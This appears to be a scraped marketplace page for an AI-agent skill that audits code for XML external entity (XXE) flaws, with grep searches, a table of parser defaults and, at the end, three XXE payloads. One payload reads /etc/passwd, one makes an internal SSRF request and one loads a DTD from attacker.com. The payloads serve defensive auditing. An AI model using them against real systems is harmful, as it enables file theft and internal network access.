From find-cve-agent
Detects XXE vulnerabilities in XML parsers processing untrusted input across JavaScript, TypeScript, Python, Go, Ruby, PHP, Java. Guides auditing configurations, defaults, and input flows for file read/SSRF risks.
npx claudepluginhub byamb4/find-cve-agentThis skill uses the workspace's default tool permissions.
Audit XML processing endpoints, SOAP services, document importers (DOCX/XLSX/SVG), and any code that parses XML from untrusted sources.
Analyzes PHP code for XXE vulnerabilities. Detects unsafe SimpleXML/DOMDocument/XMLReader, missing libxml_disable_entity_loader, LIBXML flags, XSLT/SOAP/XML-RPC attacks.
Tests web app XML endpoints for XXE vulnerabilities, enabling file reads, SSRF, and data exfiltration during authorized penetration tests.
Tests for XXE injection vulnerabilities in XML-processing endpoints like SOAP APIs, file uploads, and RSS feeds during authorized penetration tests. Provides payloads for file reads, SSRF, and data exfiltration.
Share bugs, ideas, or general feedback.
Audit XML processing endpoints, SOAP services, document importers (DOCX/XLSX/SVG), and any code that parses XML from untrusted sources.
file://, http://) -- reads files or makes HTTP requestsBoth can exist in the same parser, but they are different vulnerabilities.
# JavaScript
grep -rn "DOMParser\|XMLParser\|xml2js\|libxmljs\|xmldom\|sax\|saxes" .
# Python
grep -rn "xml\.etree\|lxml\|minidom\|xml\.sax\|defusedxml\|xmltodict" .
# Go
grep -rn "xml\.Decoder\|xml\.Unmarshal\|encoding/xml" .
# Java
grep -rn "DocumentBuilder\|SAXParser\|XMLReader\|TransformerFactory\|SchemaFactory" .
# PHP
grep -rn "simplexml\|DOMDocument\|XMLReader\|xml_parse" .
# Ruby
grep -rn "Nokogiri\|REXML\|Ox\|LibXML" .
grep -rn "FEATURE_SECURE_PROCESSING\|FEATURE_EXTERNAL_ENTITIES\|FEATURE_GENERAL_ENTITIES" .
grep -rn "resolve_entities\|external_entities\|load_external\|noent\|nonet" .
grep -rn "disallow-doctype-decl\|external-general-entities\|external-parameter-entities" .
grep -rn "XXE\|external.*entity\|doctype" .
Most modern parsers are SAFE by default. Key exceptions:
| Parser | Default External Entities | Safe? |
|---|---|---|
| xml.etree (Python) | Enabled | UNSAFE |
| xml.sax (Python) | Enabled | UNSAFE |
| lxml (Python) | Disabled | SAFE |
| defusedxml (Python) | Disabled | SAFE |
| encoding/xml (Go) | No entity support | SAFE |
| Nokogiri (Ruby) | Disabled | SAFE |
| REXML (Ruby) | Enabled | UNSAFE |
| libxml2 (C) | Depends on flags | CHECK |
| Java DocumentBuilder | Enabled | UNSAFE |
| PHP simplexml | Depends on libxml2 config | CHECK |
| PHP DOMDocument | Depends on libxml2 config | CHECK |
Does untrusted XML reach the parser? Common sources:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<root>&xxe;</root>
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://internal-server/api/secret">
]>
<root>&xxe;</root>
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % xxe SYSTEM "http://attacker.com/evil.dtd">
%xxe;
]>
<root>test</root>